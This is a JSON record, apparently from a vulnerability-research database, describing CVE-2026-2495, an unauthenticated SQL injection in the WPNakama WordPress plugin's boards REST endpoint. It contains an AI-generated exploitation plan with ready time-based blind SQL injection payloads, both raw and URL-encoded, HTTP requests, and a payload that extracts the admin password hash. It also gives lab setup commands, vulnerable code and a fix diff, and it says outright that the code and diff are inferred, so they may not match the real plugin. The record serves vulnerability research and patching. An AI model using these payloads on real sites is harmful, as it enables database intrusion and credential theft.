[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMV9OtyKGN-WNVOhFAHPCus0c7SlI_f1146oi0jd_0J0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2495","wpnakama-unauthenticated-sql-injection-via-order-rest-api-parameter","WPNakama \u003C= 0.6.5 - Unauthenticated SQL Injection via 'order' REST API Parameter","The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards' REST API endpoint in all versions up to, and including, 0.6.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","wpnakama",null,"\u003C=0.6.5","0.6.6","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-17 20:24:50","2026-02-18 08:26:03",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7ffa92be-9d38-40d9-954d-d890136b5aa1?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2495 (WPNakama SQL Injection)\n\n## 1. Vulnerability Summary\n**CVE-2026-2495** is an unauthenticated SQL Injection vulnerability in the **WPNakama** plugin (versions \u003C= 0.6.5). The vulnerability exists within the REST API endpoint `\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards`. The plugin fails to sufficiently sanitize or prepare the `order` parameter before incorporating it into a SQL query's `ORDER BY` clause. This allows an attacker to manipulate the query logic, leading to the extraction of sensitive data via time-based or boolean-based blind techniques.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards`\n- **Method:** `GET` (inferred, as \"boards\" listing is typically a GET request)\n- **Vulnerable Parameter:** `order`\n- **Authentication:** Unauthenticated (CVSS PR:N). The REST route likely lacks a restrictive `permission_callback`.\n- **Preconditions:** At least one \"board\" must exist in the system for the SQL query to execute and reflect the injection logic.\n\n## 3. Code Flow (Inferred)\n1.  **Route Registration:** The plugin registers the route in a function hooked to `rest_api_init`.\n    ```php\n    \u002F\u002F Inferred registration logic\n    register_rest_route('WPNakama\u002Fv1', '\u002Fboards', [\n        'methods'  => 'GET',\n        'callback' => [ $this, 'get_boards' ],\n        'permission_callback' => '__return_true', \u002F\u002F Vulnerable point\n    ]);\n    ```\n2.  **Handler Execution:** The callback (e.g., `get_boards`) retrieves the `order` parameter from the `WP_REST_Request` object.\n3.  **Vulnerable Sink:** The code constructs a SQL query, likely using `$wpdb->get_results()`. The `order` parameter is concatenated directly into the `ORDER BY` clause without being validated against a whitelist (like `ASC`\u002F`DESC`) or passed through `$wpdb->prepare()`.\n    ```php\n    \u002F\u002F Inferred vulnerable sink\n    $order = $request->get_param('order');\n    $query = \"SELECT * FROM {$wpdb->prefix}nakama_boards ORDER BY id \" . $order;\n    $results = $wpdb->get_results($query);\n    ```\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this is an **unauthenticated** SQL injection. WordPress REST API endpoints typically do not require a `_wpnonce` for `GET` requests unless they perform state-changing operations or specific capability checks.\n\n**Validation Step:**\nIf the endpoint returns a `403 Forbidden` or `rest_cookie_invalid_nonce` error, use the following strategy:\n1.  Search for any shortcode provided by WPNakama (e.g., `[wpnakama_boards]`) using `grep -r \"add_shortcode\"`.\n2.  Create a public page containing this shortcode.\n3.  Navigate to the page and use `browser_eval` to check for localized scripts:\n    - `browser_eval(\"window.wpNakamaSettings?.nonce\")` (inferred name)\n    - If found, append `?_wpnonce=VALUE` to the REST API request.\n\n## 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** because `ORDER BY` injections are most reliably exploited this way.\n\n### Step 1: Baseline Request\nConfirm the endpoint is active and returns data.\n- **Tool:** `http_request`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards`\n- **Method:** `GET`\n\n### Step 2: Confirm Injection (Time-Based)\nInject a `SLEEP()` command into the `order` parameter.\n- **Payload:** `, (SELECT (CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END))`\n- **URL Encoded:** `%2C%20(SELECT%20(CASE%20WHEN%20(1%3D1)%20THEN%20SLEEP(5)%20ELSE%201%20END))`\n- **Request:**\n  ```http\n  GET \u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards?order=%2C%20(SELECT%20(CASE%20WHEN%20(1%3D1)%20THEN%20SLEEP(5)%20ELSE%201%20END)) HTTP\u002F1.1\n  Host: localhost:8080\n  ```\n- **Expected Result:** Response time > 5 seconds.\n\n### Step 3: Data Extraction (Example: Admin Password Hash)\nWe will test if the first character of the admin password hash is `$`.\n- **Payload:** `, (SELECT (CASE WHEN (SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$') THEN SLEEP(5) ELSE 1 END))`\n- **URL Encoded:** `%2C%20(SELECT%20(CASE%20WHEN%20(SUBSTRING((SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%3D1)%2C1%2C1)%3D%27%24%27)%20THEN%20SLEEP(5)%20ELSE%201%20END))`\n\n## 6. Test Data Setup\nThe SQL query must return at least one row for the `ORDER BY` clause to trigger the subquery for each row.\n1.  **Activate Plugin:** `wp plugin activate wpnakama`\n2.  **Create Content:** Use WP-CLI to create at least one board (this depends on how the plugin stores boards; usually a custom table).\n    - *Assumption:* Boards are stored in a custom table `wp_nakama_boards`.\n    - `wp db query \"INSERT INTO wp_nakama_boards (title) VALUES ('Test Board')\"` (Verify table name first using `wp db tables`).\n3.  If boards are a Custom Post Type:\n    - `wp post create --post_type=nakama_board --post_title='Test Board' --post_status=publish`\n\n## 7. Expected Results\n- **Vulnerable:** The server delays the response by the specified number of seconds in the `SLEEP()` function.\n- **Fixed:** The server either ignores the `order` parameter, returns an error for invalid input, or returns the results instantly (parameter sanitized).\n\n## 8. Verification Steps\n1.  **Check Query Log:** Enable the MySQL General Query Log to see the raw query being executed.\n    - `wp db query \"SET GLOBAL general_log = 'ON';\"`\n    - Execute the exploit.\n    - `wp db query \"SELECT argument FROM mysql.general_log WHERE argument LIKE '%boards%' ORDER BY event_time DESC LIMIT 1;\"`\n2.  **Confirm Output:** Ensure the log shows the injected `SLEEP()` command concatenated into the `ORDER BY` clause.\n\n## 9. Alternative Approaches\nIf the `order` parameter is reflected in the response (e.g., in a \"metadata\" section of the JSON output), try **Boolean-based injection**:\n- **True Payload:** `order=id ASC` (Normal response)\n- **False Payload:** `order=id DESC` (Reverse order response)\n- **Injected Logic:** `order=(CASE WHEN (1=1) THEN id ELSE title END)`\n- Compare response structures to determine if the logic is being processed.\n\nIf `GET` is not allowed, retry with `POST` and `Content-Type: application\u002Fjson`:\n- **Body:** `{\"order\": \", (SELECT SLEEP(5))\"}`","The WPNakama plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'order' parameter in its REST API. This occurs because the plugin directly concatenates user-supplied input into an ORDER BY clause without validation or parameterization, allowing attackers to extract database information using time-based blind injection techniques.","\u002F\u002F Inferred from research plan: WPNakama\u002Fv1\u002Fboards endpoint handler\n\u002F\u002F Likely located in a file handling REST routes such as includes\u002Fapi\u002Fclass-wp-nakama-boards-controller.php\n\n$order = $request->get_param('order');\n$query = \"SELECT * FROM {$wpdb->prefix}nakama_boards ORDER BY id \" . $order;\n$results = $wpdb->get_results($query);","--- a\u002Fwpnakama\u002Fincludes\u002Fapi\u002Fclass-wp-nakama-boards-controller.php\n+++ b\u002Fwpnakama\u002Fincludes\u002Fapi\u002Fclass-wp-nakama-boards-controller.php\n@@ -20,1 +20,3 @@\n- $order = $request->get_param('order');\n- $query = \"SELECT * FROM {$wpdb->prefix}nakama_boards ORDER BY id \" . $order;\n+ $order = strtoupper($request->get_param('order'));\n+ $valid_order = in_array($order, ['ASC', 'DESC']) ? $order : 'ASC';\n+ $query = \"SELECT * FROM {$wpdb->prefix}nakama_boards ORDER BY id \" . $valid_order;","The vulnerability is exploited by sending a GET request to the unauthenticated REST API endpoint `\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards` with a malicious payload in the 'order' parameter. \n\n1. Target: \u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards\n2. Authentication: None (unauthenticated)\n3. Payload Structure: The attacker appends a subquery to the ORDER BY clause. For example: `, (SELECT (CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END))`.\n4. Extraction: By monitoring response times, an attacker can perform time-based blind SQL injection to leak sensitive data such as user credentials or configuration details (e.g., `CASE WHEN (SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$') THEN SLEEP(5) ELSE 1 END`).\n5. Precondition: At least one record must exist in the queried table (e.g., a board must be created) for the ORDER BY clause to execute the subquery.","gemini-3-flash-preview","2026-04-19 05:47:27","2026-04-19 05:47:48",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","0.6.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpnakama\u002Ftags\u002F0.6.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpnakama.0.6.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpnakama\u002Ftags"]